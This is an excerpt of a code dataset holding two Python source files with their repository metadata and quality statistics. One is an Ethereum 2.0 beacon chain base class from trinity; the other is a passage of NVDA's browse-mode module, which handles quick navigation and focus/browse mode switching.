hexsha
stringlengths 40
40
| size
int64 133
946k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
192
| max_stars_repo_name
stringlengths 6
125
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
9
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
192
| max_issues_repo_name
stringlengths 6
125
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
9
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
192
| max_forks_repo_name
stringlengths 6
125
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
9
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 133
946k
| avg_line_length
float64 5.01
99.2
| max_line_length
int64 17
999
| alphanum_fraction
float64 0.28
0.9
| qsc_code_num_words_quality_signal
int64 30
120k
| qsc_code_num_chars_quality_signal
float64 133
946k
| qsc_code_mean_word_length_quality_signal
float64 2
10
| qsc_code_frac_words_unique_quality_signal
float64 0.03
1
| qsc_code_frac_chars_top_2grams_quality_signal
float64 0
0.2
| qsc_code_frac_chars_top_3grams_quality_signal
float64 0
0.18
| qsc_code_frac_chars_top_4grams_quality_signal
float64 0
0.16
| qsc_code_frac_chars_dupe_5grams_quality_signal
float64 0
0.8
| qsc_code_frac_chars_dupe_6grams_quality_signal
float64 0
0.7
| qsc_code_frac_chars_dupe_7grams_quality_signal
float64 0
0.7
| qsc_code_frac_chars_dupe_8grams_quality_signal
float64 0
0.7
| qsc_code_frac_chars_dupe_9grams_quality_signal
float64 0
0.7
| qsc_code_frac_chars_dupe_10grams_quality_signal
float64 0
0.6
| qsc_code_frac_chars_replacement_symbols_quality_signal
float64 0
0.01
| qsc_code_frac_chars_digital_quality_signal
float64 0
0.2
| qsc_code_frac_chars_whitespace_quality_signal
float64 0.03
0.5
| qsc_code_size_file_byte_quality_signal
float64 133
946k
| qsc_code_num_lines_quality_signal
float64 10
23.3k
| qsc_code_num_chars_line_max_quality_signal
float64 18
1k
| qsc_code_num_chars_line_mean_quality_signal
float64 5.09
99.2
| qsc_code_frac_chars_alphabet_quality_signal
float64 0.5
0.96
| qsc_code_frac_chars_comments_quality_signal
float64 0
0.8
| qsc_code_cate_xml_start_quality_signal
float64 0
0
| qsc_code_frac_lines_dupe_lines_quality_signal
float64 0
0.7
| qsc_code_cate_autogen_quality_signal
float64 0
0
| qsc_code_frac_lines_long_string_quality_signal
float64 0
0.2
| qsc_code_frac_chars_string_length_quality_signal
float64 0
0.6
| qsc_code_frac_chars_long_word_length_quality_signal
float64 0
0.4
| qsc_code_frac_lines_string_concat_quality_signal
float64 0
0.37
| qsc_code_cate_encoded_data_quality_signal
float64 0
0
| qsc_code_frac_chars_hex_words_quality_signal
float64 0
0.32
| qsc_code_frac_lines_prompt_comments_quality_signal
float64 0
0.01
| qsc_code_frac_lines_assert_quality_signal
float64 0
0.4
| qsc_codepython_cate_ast_quality_signal
float64 1
1
| qsc_codepython_frac_lines_func_ratio_quality_signal
float64 0
0.2
| qsc_codepython_cate_var_zero_quality_signal
bool 1
class | qsc_codepython_frac_lines_pass_quality_signal
float64 0.05
1
| qsc_codepython_frac_lines_import_quality_signal
float64 0
0.3
| qsc_codepython_frac_lines_simplefunc_quality_signal
float64 0
0.1
| qsc_codepython_score_lines_no_logic_quality_signal
float64 0
1.5
| qsc_codepython_frac_lines_print_quality_signal
float64 0
0.4
| qsc_code_num_words
int64 0
0
| qsc_code_num_chars
int64 0
0
| qsc_code_mean_word_length
int64 0
0
| qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 0
0
| qsc_code_frac_chars_top_3grams
int64 0
0
| qsc_code_frac_chars_top_4grams
int64 0
0
| qsc_code_frac_chars_dupe_5grams
int64 0
0
| qsc_code_frac_chars_dupe_6grams
int64 0
0
| qsc_code_frac_chars_dupe_7grams
int64 0
0
| qsc_code_frac_chars_dupe_8grams
int64 0
0
| qsc_code_frac_chars_dupe_9grams
int64 0
0
| qsc_code_frac_chars_dupe_10grams
int64 0
0
| qsc_code_frac_chars_replacement_symbols
int64 0
0
| qsc_code_frac_chars_digital
int64 0
0
| qsc_code_frac_chars_whitespace
int64 0
0
| qsc_code_size_file_byte
int64 0
0
| qsc_code_num_lines
int64 0
0
| qsc_code_num_chars_line_max
int64 0
0
| qsc_code_num_chars_line_mean
int64 0
0
| qsc_code_frac_chars_alphabet
int64 0
0
| qsc_code_frac_chars_comments
int64 0
0
| qsc_code_cate_xml_start
int64 0
0
| qsc_code_frac_lines_dupe_lines
int64 0
0
| qsc_code_cate_autogen
int64 0
0
| qsc_code_frac_lines_long_string
int64 0
0
| qsc_code_frac_chars_string_length
int64 0
0
| qsc_code_frac_chars_long_word_length
int64 0
0
| qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 0
0
| qsc_code_frac_chars_hex_words
int64 0
0
| qsc_code_frac_lines_prompt_comments
int64 0
0
| qsc_code_frac_lines_assert
int64 0
0
| qsc_codepython_cate_ast
int64 0
0
| qsc_codepython_frac_lines_func_ratio
int64 0
0
| qsc_codepython_cate_var_zero
int64 0
0
| qsc_codepython_frac_lines_pass
int64 1
1
| qsc_codepython_frac_lines_import
int64 0
0
| qsc_codepython_frac_lines_simplefunc
int64 0
0
| qsc_codepython_score_lines_no_logic
int64 0
0
| qsc_codepython_frac_lines_print
int64 0
0
| effective
stringclasses 1
value | hits
int64 1
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d9b79f86fa592dbe24c72c454192af966a916a5a
| 12,444
|
py
|
Python
|
eth2/beacon/chains/base.py
|
mhchia/trinity
|
e40e475064ca4605887706e9b0e4f8e2349b10cd
|
[
"MIT"
] | null | null | null |
eth2/beacon/chains/base.py
|
mhchia/trinity
|
e40e475064ca4605887706e9b0e4f8e2349b10cd
|
[
"MIT"
] | null | null | null |
eth2/beacon/chains/base.py
|
mhchia/trinity
|
e40e475064ca4605887706e9b0e4f8e2349b10cd
|
[
"MIT"
] | null | null | null |
from abc import (
ABC,
abstractmethod,
)
import logging
from typing import (
TYPE_CHECKING,
Tuple,
Type,
)
from eth._utils.datatypes import (
Configurable,
)
from eth.db.backends.base import (
BaseAtomicDB,
)
from eth.exceptions import (
BlockNotFound,
)
from eth.validation import (
validate_word,
)
from eth_typing import (
Hash32,
)
from eth_utils import (
ValidationError,
encode_hex,
)
from eth2._utils.ssz import (
validate_imported_block_unchanged,
)
from eth2.beacon.db.chain import (
BaseBeaconChainDB,
BeaconChainDB,
)
from eth2.beacon.exceptions import (
BlockClassError,
StateMachineNotFound,
)
from eth2.beacon.types.blocks import (
BaseBeaconBlock,
)
from eth2.beacon.types.states import (
BeaconState,
)
from eth2.beacon.typing import (
FromBlockParams,
Slot,
)
from eth2.beacon.validation import (
validate_slot,
)
if TYPE_CHECKING:
from eth2.beacon.state_machines.base import ( # noqa: F401
BaseBeaconStateMachine,
)
class BaseBeaconChain(Configurable, ABC):
"""
The base class for all BeaconChain objects
"""
chaindb = None # type: BaseBeaconChainDB
chaindb_class = None # type: Type[BaseBeaconChainDB]
sm_configuration = None # type: Tuple[Tuple[Slot, Type[BaseBeaconStateMachine]], ...]
chain_id = None # type: int
#
# Helpers
#
@classmethod
@abstractmethod
def get_chaindb_class(cls) -> Type[BaseBeaconChainDB]:
pass
#
# Chain API
#
@classmethod
@abstractmethod
def from_genesis(cls,
base_db: BaseAtomicDB,
genesis_state: BeaconState,
genesis_block: BaseBeaconBlock) -> 'BaseBeaconChain':
pass
#
# State Machine API
#
@classmethod
@abstractmethod
def get_state_machine_class(
cls,
block: BaseBeaconBlock) -> Type['BaseBeaconStateMachine']:
pass
@abstractmethod
def get_state_machine(self, at_block: BaseBeaconBlock=None) -> 'BaseBeaconStateMachine':
pass
@classmethod
@abstractmethod
def get_state_machine_class_for_block_slot(
cls,
slot: Slot) -> Type['BaseBeaconStateMachine']:
pass
#
# Block API
#
@abstractmethod
def get_block_class(self, block_root: Hash32) -> Type[BaseBeaconBlock]:
pass
@abstractmethod
def create_block_from_parent(self,
parent_block: BaseBeaconBlock,
block_params: FromBlockParams) -> BaseBeaconBlock:
pass
@abstractmethod
def get_block_by_root(self, block_root: Hash32) -> BaseBeaconBlock:
pass
@abstractmethod
def get_canonical_head(self) -> BaseBeaconBlock:
pass
@abstractmethod
def get_score(self, block_root: Hash32) -> int:
pass
@abstractmethod
def ensure_block(self, block: BaseBeaconBlock=None) -> BaseBeaconBlock:
pass
@abstractmethod
def get_block(self) -> BaseBeaconBlock:
pass
@abstractmethod
def get_canonical_block_by_slot(self, slot: Slot) -> BaseBeaconBlock:
pass
@abstractmethod
def get_canonical_block_root(self, slot: Slot) -> Hash32:
pass
@abstractmethod
def import_block(
self,
block: BaseBeaconBlock,
perform_validation: bool=True
) -> Tuple[BaseBeaconBlock, Tuple[BaseBeaconBlock, ...], Tuple[BaseBeaconBlock, ...]]:
pass
class BeaconChain(BaseBeaconChain):
"""
A Chain is a combination of one or more ``StateMachine`` classes. Each ``StateMachine``
is associated with a range of slots. The Chain class acts as a wrapper around these other
StateMachine classes, delegating operations to the appropriate StateMachine depending on the
current block slot number.
"""
logger = logging.getLogger("eth2.beacon.chains.BeaconChain")
chaindb_class = BeaconChainDB # type: Type[BaseBeaconChainDB]
def __init__(self, base_db: BaseAtomicDB) -> None:
if not self.sm_configuration:
raise ValueError(
"The Chain class cannot be instantiated with an empty `sm_configuration`"
)
else:
# TODO implment validate_sm_configuration(self.sm_configuration)
# validate_sm_configuration(self.sm_configuration)
pass
self.chaindb = self.get_chaindb_class()(base_db)
#
# Helpers
#
@classmethod
def get_chaindb_class(cls) -> Type['BaseBeaconChainDB']:
if cls.chaindb_class is None:
raise AttributeError("`chaindb_class` not set")
return cls.chaindb_class
#
# Chain API
#
@classmethod
def from_genesis(cls,
base_db: BaseAtomicDB,
genesis_state: BeaconState,
genesis_block: BaseBeaconBlock) -> 'BaseBeaconChain':
"""
Initialize the ``BeaconChain`` from a genesis state.
"""
sm_class = cls.get_state_machine_class_for_block_slot(genesis_block.slot)
if type(genesis_block) != sm_class.block_class:
raise BlockClassError(
"Given genesis block class: {}, StateMachine.block_class: {}".format(
type(genesis_block),
sm_class.block_class
)
)
chaindb = cls.get_chaindb_class()(db=base_db)
chaindb.persist_state(genesis_state)
return cls._from_genesis_block(base_db, genesis_block)
@classmethod
def _from_genesis_block(cls,
base_db: BaseAtomicDB,
genesis_block: BaseBeaconBlock) -> 'BaseBeaconChain':
"""
Initialize the ``BeaconChain`` from the genesis block.
"""
chaindb = cls.get_chaindb_class()(db=base_db)
chaindb.persist_block(genesis_block, genesis_block.__class__)
return cls(base_db)
#
# StateMachine API
#
@classmethod
def get_state_machine_class(cls, block: BaseBeaconBlock) -> Type['BaseBeaconStateMachine']:
"""
Returns the ``StateMachine`` instance for the given block slot number.
"""
return cls.get_state_machine_class_for_block_slot(block.slot)
@classmethod
def get_state_machine_class_for_block_slot(
cls,
slot: Slot) -> Type['BaseBeaconStateMachine']:
"""
Return the ``StateMachine`` class for the given block slot number.
"""
if cls.sm_configuration is None:
raise AttributeError("Chain classes must define the StateMachines in sm_configuration")
validate_slot(slot)
for start_slot, sm_class in reversed(cls.sm_configuration):
if slot >= start_slot:
return sm_class
raise StateMachineNotFound("No StateMachine available for block slot: #{0}".format(slot))
def get_state_machine(self, at_block: BaseBeaconBlock=None) -> 'BaseBeaconStateMachine':
"""
Return the ``StateMachine`` instance for the given block number.
"""
block = self.ensure_block(at_block)
sm_class = self.get_state_machine_class_for_block_slot(block.slot)
return sm_class(
chaindb=self.chaindb,
block=block,
)
#
# Block API
#
def get_block_class(self, block_root: Hash32) -> Type[BaseBeaconBlock]:
slot = self.chaindb.get_slot_by_root(block_root)
sm_class = self.get_state_machine_class_for_block_slot(slot)
block_class = sm_class.block_class
return block_class
def create_block_from_parent(self,
parent_block: BaseBeaconBlock,
block_params: FromBlockParams) -> BaseBeaconBlock:
"""
Passthrough helper to the ``StateMachine`` class of the block descending from the
given block.
"""
return self.get_state_machine_class_for_block_slot(
slot=parent_block.slot + 1 if block_params.slot is None else block_params.slot,
).create_block_from_parent(parent_block, block_params)
def get_block_by_root(self, block_root: Hash32) -> BaseBeaconBlock:
"""
Return the requested block as specified by block hash.
Raise ``BlockNotFound`` if there's no block with the given hash in the db.
"""
validate_word(block_root, title="Block Hash")
block_class = self.get_block_class(block_root)
return self.chaindb.get_block_by_root(block_root, block_class)
def get_canonical_head(self) -> BaseBeaconBlock:
"""
Return the block at the canonical chain head.
Raise ``CanonicalHeadNotFound`` if there's no head defined for the canonical chain.
"""
block_root = self.chaindb.get_canonical_head_root()
block_class = self.get_block_class(block_root)
return self.chaindb.get_block_by_root(block_root, block_class)
def get_score(self, block_root: Hash32) -> int:
"""
Return the score of the block with the given hash.
Raise ``BlockNotFound`` if there is no matching black hash.
"""
return self.chaindb.get_score(block_root)
def ensure_block(self, block: BaseBeaconBlock=None) -> BaseBeaconBlock:
"""
Return ``block`` if it is not ``None``, otherwise return the block
of the canonical head.
"""
if block is None:
head = self.get_canonical_head()
return self.create_block_from_parent(head, FromBlockParams())
else:
return block
def get_block(self) -> BaseBeaconBlock:
"""
Return the current TIP block.
"""
return self.get_state_machine().block
def get_canonical_block_by_slot(self, slot: Slot) -> BaseBeaconBlock:
"""
Return the block with the given number in the canonical chain.
Raise ``BlockNotFound`` if there's no block with the given number in the
canonical chain.
"""
validate_slot(slot)
return self.get_block_by_root(self.chaindb.get_canonical_block_root(slot))
def get_canonical_block_root(self, slot: Slot) -> Hash32:
"""
Return the block hash with the given number in the canonical chain.
Raise ``BlockNotFound`` if there's no block with the given number in the
canonical chain.
"""
return self.chaindb.get_canonical_block_root(slot)
def import_block(
self,
block: BaseBeaconBlock,
perform_validation: bool=True
) -> Tuple[BaseBeaconBlock, Tuple[BaseBeaconBlock, ...], Tuple[BaseBeaconBlock, ...]]:
"""
Import a complete block and returns a 3-tuple
- the imported block
- a tuple of blocks which are now part of the canonical chain.
- a tuple of blocks which were canonical and now are no longer canonical.
"""
try:
parent_block = self.get_block_by_root(block.previous_block_root)
except BlockNotFound:
raise ValidationError(
"Attempt to import block #{}. Cannot import block {} before importing "
"its parent block at {}".format(
block.slot,
block.signed_root,
block.previous_block_root,
)
)
base_block_for_import = self.create_block_from_parent(
parent_block,
FromBlockParams(),
)
state, imported_block = self.get_state_machine(base_block_for_import).import_block(block)
# Validate the imported block.
if perform_validation:
validate_imported_block_unchanged(imported_block, block)
# TODO: Now it just persists all state. Should design how to clean up the old state.
self.chaindb.persist_state(state)
(
new_canonical_blocks,
old_canonical_blocks,
) = self.chaindb.persist_block(imported_block, imported_block.__class__)
self.logger.debug(
'IMPORTED_BLOCK: slot %s | signed root %s',
imported_block.slot,
encode_hex(imported_block.signed_root),
)
return imported_block, new_canonical_blocks, old_canonical_blocks
| 30.955224
| 99
| 0.634201
| 1,348
| 12,444
| 5.622404
| 0.141691
| 0.017417
| 0.025729
| 0.02375
| 0.485024
| 0.445046
| 0.38224
| 0.338831
| 0.288429
| 0.264283
| 0
| 0.003717
| 0.286564
| 12,444
| 401
| 100
| 31.032419
| 0.849966
| 0.180006
| 0
| 0.400794
| 0
| 0
| 0.064676
| 0.019259
| 0
| 0
| 0
| 0.004988
| 0
| 1
| 0.126984
| false
| 0.063492
| 0.115079
| 0
| 0.34127
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
d9f04eac1f39d4c14950ae0caf3dff21f18defd4
| 84,990
|
py
|
Python
|
source/browseMode.py
|
neal-hub/nvda-test
|
4c3a67b2eafa9721c5de3f671d10e60ab2d43865
|
[
"bzip2-1.0.6"
] | 1
|
2022-02-20T23:10:39.000Z
|
2022-02-20T23:10:39.000Z
|
source/browseMode.py
|
neal-hub/nvda-test
|
4c3a67b2eafa9721c5de3f671d10e60ab2d43865
|
[
"bzip2-1.0.6"
] | null | null | null |
source/browseMode.py
|
neal-hub/nvda-test
|
4c3a67b2eafa9721c5de3f671d10e60ab2d43865
|
[
"bzip2-1.0.6"
] | null | null | null |
# A part of NonVisual Desktop Access (NVDA)
# Copyright (C) 2007-2021 NV Access Limited, Babbage B.V., James Teh, Leonard de Ruijter,
# Thomas Stivers, Accessolutions, Julien Cochuyt
# This file is covered by the GNU General Public License.
# See the file COPYING for more details.
from typing import Any, Callable, Union
import os
import itertools
import collections
import winsound
import time
import weakref
import wx
import core
from logHandler import log
import documentBase
import review
import scriptHandler
import eventHandler
import nvwave
import queueHandler
import gui
import ui
import cursorManager
from scriptHandler import script, isScriptWaiting, willSayAllResume
import aria
import controlTypes
from controlTypes import OutputReason
import config
import textInfos
import braille
import vision
import speech
from speech import sayAll
import treeInterceptorHandler
import inputCore
import api
import gui.guiHelper
from gui.dpiScalingHelper import DpiScalingHelperMixinWithoutInit
from NVDAObjects import NVDAObject
import gui.contextHelp
from abc import ABCMeta, abstractmethod
import globalVars
from typing import Optional
def reportPassThrough(treeInterceptor,onlyIfChanged=True):
"""Reports the pass through mode if it has changed.
@param treeInterceptor: The current Browse Mode treeInterceptor.
@type treeInterceptor: L{BrowseModeTreeInterceptor}
@param onlyIfChanged: if true reporting will not happen if the last reportPassThrough reported the same thing.
@type onlyIfChanged: bool
"""
if not onlyIfChanged or treeInterceptor.passThrough != reportPassThrough.last:
if config.conf["virtualBuffers"]["passThroughAudioIndication"]:
sound = "focusMode.wav" if treeInterceptor.passThrough else "browseMode.wav"
nvwave.playWaveFile(os.path.join(globalVars.appDir, "waves", sound))
else:
if treeInterceptor.passThrough:
# Translators: The mode to interact with controls in documents
ui.message(_("Focus mode"))
else:
# Translators: The mode that presents text in a flat representation
# that can be navigated with the cursor keys like in a text document
ui.message(_("Browse mode"))
reportPassThrough.last = treeInterceptor.passThrough
reportPassThrough.last = False
def mergeQuickNavItemIterators(iterators,direction="next"):
"""
Merges multiple iterators that emit L{QuickNavItem} objects, yielding them from first to last.
They are sorted using min or max (__lt__ should be implemented on the L{QuickNavItem} objects).
@param iters: the iterators you want to merge.
@type iters: sequence of iterators that emit L{QuicknavItem} objects.
@param direction: the direction these iterators are searching (e.g. next, previous)
@type direction: string
"""
finder=min if direction=="next" else max
curValues=[]
# Populate a list with all iterators and their corisponding first value
for it in iterators:
try:
val=next(it)
except StopIteration:
continue
curValues.append((it,val))
# Until all iterators have been used up,
# Find the first (minimum or maximum) of all the values,
# emit that, and update the list with the next available value for the iterator whose value was emitted.
while len(curValues)>0:
first=finder(curValues,key=lambda x: x[1])
curValues.remove(first)
it,val=first
yield val
try:
newVal=next(it)
except StopIteration:
continue
curValues.append((it,newVal))
class QuickNavItem(object, metaclass=ABCMeta):
""" Emitted by L{BrowseModeTreeInterceptor._iterNodesByType}, this represents one of many positions in a browse mode document, based on the type of item being searched for (e.g. link, heading, table etc)."""
itemType=None #: The type of items searched for (e.g. link, heading, table etc)
label=None #: The label that should represent this item in the Elements list.
isAfterSelection=False #: Is this item positioned after the caret in the document? Used by the elements list to place its own selection.
def __init__(self,itemType,document):
"""
@param itemType: the type that was searched for (e.g. link, heading, table etc)
@type itemType: string
@param document: the browse mode document this item is a part of.
@type document: L{BrowseModeTreeInterceptor}
"""
self.itemType=itemType
self.document=document
@abstractmethod
def isChild(self,parent):
"""
Is this item a child of the given parent?
This is used when representing items in a hierarchical tree structure, such as the Elements List.
@param parent: the item of whom this item may be a child of.
@type parent: L{QuickNavItem}
@return: True if this item is a child, false otherwise.
@rtype: bool
"""
raise NotImplementedError
@abstractmethod
def report(self,readUnit=None):
"""
Reports the contents of this item.
@param readUnit: the optional unit (e.g. line, paragraph) that should be used to announce the item position when moved to. If not given, then the full sise of the item is used.
@type readUnit: a L{textInfos}.UNIT_* constant.
"""
raise NotImplementedError
@abstractmethod
def moveTo(self):
"""
Moves the browse mode caret or focus to this item.
"""
raise NotImplementedError
def activate(self):
"""
Activates this item's position. E.g. follows a link, presses a button etc.
"""
raise NotImplementedError
def rename(self,newName):
"""
Renames this item with the new name.
"""
raise NotImplementedError
@property
def isRenameAllowed(self):
return False
class TextInfoQuickNavItem(QuickNavItem):
""" Represents a quick nav item in a browse mode document who's positions are represented by a L{textInfos.TextInfo}. """
def __init__(self,itemType,document,textInfo):
"""
See L{QuickNavItem.__init__} for itemType and document argument definitions.
@param textInfo: the textInfo position this item represents.
@type textInfo: L{textInfos.TextInfo}
"""
self.textInfo=textInfo
super(TextInfoQuickNavItem,self).__init__(itemType,document)
def __lt__(self,other):
return self.textInfo.compareEndPoints(other.textInfo,"startToStart")<0
@property
def obj(self):
return self.textInfo.basePosition if isinstance(self.textInfo.basePosition,NVDAObject) else None
@property
def label(self):
return self.textInfo.text.strip()
def isChild(self,parent):
if parent.textInfo.isOverlapping(self.textInfo):
return True
return False
def report(self,readUnit=None):
info=self.textInfo
# If we are dealing with a form field, ensure we don't read the whole content if it's an editable text.
if self.itemType == "formField":
if self.obj.role == controlTypes.Role.EDITABLETEXT:
readUnit = textInfos.UNIT_LINE
if readUnit:
fieldInfo = info.copy()
info.collapse()
info.move(readUnit, 1, endPoint="end")
if info.compareEndPoints(fieldInfo, "endToEnd") > 0:
# We've expanded past the end of the field, so limit to the end of the field.
info.setEndPoint(fieldInfo, "endToEnd")
speech.speakTextInfo(info, reason=OutputReason.QUICKNAV)
def activate(self):
self.textInfo.obj._activatePosition(info=self.textInfo)
def moveTo(self):
if self.document.passThrough and getattr(self, "obj", False):
if controlTypes.State.FOCUSABLE in self.obj.states:
self.obj.setFocus()
return
self.document.passThrough = False
reportPassThrough(self.document)
info = self.textInfo.copy()
info.collapse()
self.document._set_selection(info, reason=OutputReason.QUICKNAV)
@property
def isAfterSelection(self):
caret=self.document.makeTextInfo(textInfos.POSITION_CARET)
return self.textInfo.compareEndPoints(caret, "startToStart") > 0
def _getLabelForProperties(self, labelPropertyGetter: Callable[[str], Optional[Any]]):
"""
Fetches required properties for this L{TextInfoQuickNavItem} and constructs a label to be shown in an elements list.
This can be used by subclasses to implement the L{label} property.
@Param labelPropertyGetter: A callable taking 1 argument, specifying the property to fetch.
For example, if L{itemType} is landmark, the callable must return the landmark type when "landmark" is passed as the property argument.
Alternative property names might be name or value.
The callable must return None if the property doesn't exist.
An expected callable might be get method on a L{Dict},
or "lambda property: getattr(self.obj, property, None)" for an L{NVDAObject}.
"""
content = self.textInfo.text.strip()
if self.itemType == "heading":
# Output: displayed text of the heading.
return content
labelParts = None
name = labelPropertyGetter("name")
if self.itemType == "landmark":
landmark = aria.landmarkRoles.get(labelPropertyGetter("landmark"))
# Example output: main menu; navigation
labelParts = (name, landmark)
else:
role: Union[controlTypes.Role, int] = labelPropertyGetter("role")
role = controlTypes.Role(role)
roleText = role.displayString
# Translators: Reported label in the elements list for an element which which has no name and value
unlabeled = _("Unlabeled")
realStates = labelPropertyGetter("states")
labeledStates = " ".join(controlTypes.processAndLabelStates(role, realStates, OutputReason.FOCUS))
if self.itemType == "formField":
if role in (
controlTypes.Role.BUTTON,
controlTypes.Role.DROPDOWNBUTTON,
controlTypes.Role.TOGGLEBUTTON,
controlTypes.Role.SPLITBUTTON,
controlTypes.Role.MENUBUTTON,
controlTypes.Role.DROPDOWNBUTTONGRID,
controlTypes.Role.TREEVIEWBUTTON
):
# Example output: Mute; toggle button; pressed
labelParts = (content or name or unlabeled, roleText, labeledStates)
else:
# Example output: Find a repository...; edit; has auto complete; NVDA
labelParts = (name or unlabeled, roleText, labeledStates, content)
elif self.itemType in ("link", "button"):
# Example output: You have unread notifications; visited
labelParts = (content or name or unlabeled, labeledStates)
if labelParts:
label = "; ".join(lp for lp in labelParts if lp)
else:
label = content
return label
class BrowseModeTreeInterceptor(treeInterceptorHandler.TreeInterceptor):
scriptCategory = inputCore.SCRCAT_BROWSEMODE
_disableAutoPassThrough = False
APPLICATION_ROLES = (controlTypes.Role.APPLICATION, controlTypes.Role.DIALOG)
def _get_currentNVDAObject(self):
raise NotImplementedError
def _get_currentFocusableNVDAObject(self):
return self.makeTextInfo(textInfos.POSITION_CARET).focusableNVDAObjectAtStart
def event_treeInterceptor_gainFocus(self):
"""Triggered when this browse mode interceptor gains focus.
This event is only fired upon entering this treeInterceptor when it was not the current treeInterceptor before.
This is different to L{event_gainFocus}, which is fired when an object inside this treeInterceptor gains focus, even if that object is in the same treeInterceptor.
"""
reportPassThrough(self)
ALWAYS_SWITCH_TO_PASS_THROUGH_ROLES = frozenset({
controlTypes.Role.COMBOBOX,
controlTypes.Role.EDITABLETEXT,
controlTypes.Role.LIST,
controlTypes.Role.LISTITEM,
controlTypes.Role.SLIDER,
controlTypes.Role.TABCONTROL,
controlTypes.Role.MENUBAR,
controlTypes.Role.POPUPMENU,
controlTypes.Role.TREEVIEW,
controlTypes.Role.TREEVIEWITEM,
controlTypes.Role.SPINBUTTON,
controlTypes.Role.TABLEROW,
controlTypes.Role.TABLECELL,
controlTypes.Role.TABLEROWHEADER,
controlTypes.Role.TABLECOLUMNHEADER,
})
SWITCH_TO_PASS_THROUGH_ON_FOCUS_ROLES = frozenset({
controlTypes.Role.LISTITEM,
controlTypes.Role.RADIOBUTTON,
controlTypes.Role.TAB,
controlTypes.Role.MENUITEM,
controlTypes.Role.RADIOMENUITEM,
controlTypes.Role.CHECKMENUITEM,
})
IGNORE_DISABLE_PASS_THROUGH_WHEN_FOCUSED_ROLES = frozenset({
controlTypes.Role.MENUITEM,
controlTypes.Role.RADIOMENUITEM,
controlTypes.Role.CHECKMENUITEM,
controlTypes.Role.TABLECELL,
})
def shouldPassThrough(self, obj, reason: Optional[OutputReason] = None):
"""Determine whether pass through mode should be enabled (focus mode) or disabled (browse mode) for a given object.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
@param reason: The reason for this query;
one of the output reasons, or C{None} for manual pass through mode activation by the user.
@return: C{True} if pass through mode (focus mode) should be enabled, C{False} if it should be disabled (browse mode).
"""
if reason and (
self.disableAutoPassThrough
or (reason == OutputReason.FOCUS and not config.conf["virtualBuffers"]["autoPassThroughOnFocusChange"])
or (reason == OutputReason.CARET and not config.conf["virtualBuffers"]["autoPassThroughOnCaretMove"])
):
# This check relates to auto pass through and auto pass through is disabled, so don't change the pass through state.
return self.passThrough
if reason == OutputReason.QUICKNAV:
return False
states = obj.states
role = obj.role
if controlTypes.State.EDITABLE in states and controlTypes.State.UNAVAILABLE not in states:
return True
# Menus sometimes get focus due to menuStart events even though they don't report as focused/focusable.
if not obj.isFocusable and controlTypes.State.FOCUSED not in states and role != controlTypes.Role.POPUPMENU:
return False
# many controls that are read-only should not switch to passThrough.
# However, there are exceptions.
if controlTypes.State.READONLY in states:
# #13221: For Slack message lists, and the MS Edge downloads window, switch to passthrough
# even though the list item and list are read-only, but focusable.
if (
role == controlTypes.Role.LISTITEM and controlTypes.State.FOCUSED in states
and obj.parent.role == controlTypes.Role.LIST and controlTypes.State.FOCUSABLE in obj.parent.states
):
return True
# Certain controls such as combo boxes and readonly edits are read-only but still interactive.
# #5118: read-only ARIA grids should also be allowed (focusable table cells, rows and headers).
if role not in (
controlTypes.Role.EDITABLETEXT, controlTypes.Role.COMBOBOX, controlTypes.Role.TABLEROW,
controlTypes.Role.TABLECELL, controlTypes.Role.TABLEROWHEADER, controlTypes.Role.TABLECOLUMNHEADER
):
return False
# Any roles or states for which we always switch to passThrough
if role in self.ALWAYS_SWITCH_TO_PASS_THROUGH_ROLES or controlTypes.State.EDITABLE in states:
return True
# focus is moving to this control. Perhaps after pressing tab or clicking a button that brings up a menu (via javascript)
if reason == OutputReason.FOCUS:
if role in self.SWITCH_TO_PASS_THROUGH_ON_FOCUS_ROLES:
return True
# If this is a focus change, pass through should be enabled for certain ancestor containers.
# this is done last for performance considerations. Walking up the through the parents could be costly
while obj and obj != self.rootNVDAObject:
if obj.role == controlTypes.Role.TOOLBAR:
return True
obj = obj.parent
return False
def _get_shouldTrapNonCommandGestures(self):
return config.conf['virtualBuffers']['trapNonCommandGestures']
def script_trapNonCommandGesture(self,gesture):
winsound.PlaySound("default",1)
singleLetterNavEnabled=True #: Whether single letter navigation scripts should be active (true) or if these letters should fall to the application.
def getAlternativeScript(self,gesture,script):
if self.passThrough or not gesture.isCharacter:
return script
if not self.singleLetterNavEnabled:
return None
if not script and self.shouldTrapNonCommandGestures:
script=self.script_trapNonCommandGesture
return script
def script_toggleSingleLetterNav(self,gesture):
if self.singleLetterNavEnabled:
self.singleLetterNavEnabled=False
# Translators: Reported when single letter navigation in browse mode is turned off.
ui.message(_("Single letter navigation off"))
else:
self.singleLetterNavEnabled=True
